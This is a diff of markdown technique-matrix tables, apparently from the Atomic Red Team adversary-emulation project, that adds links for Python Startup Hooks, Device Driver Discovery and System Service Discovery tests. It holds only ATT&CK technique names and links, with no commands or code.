 |  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
@@ -37,7 +37,7 @@
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Overwrite Process Arguments [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) |  | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Bind Mounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) |  |  |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -4,12 +4,12 @@
 | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) |  | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -31,7 +31,7 @@
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
 |  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-|  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -40,7 +40,7 @@
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) |  | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) |  | [System Time Discovery](../../T1124/T1124.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) |  | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
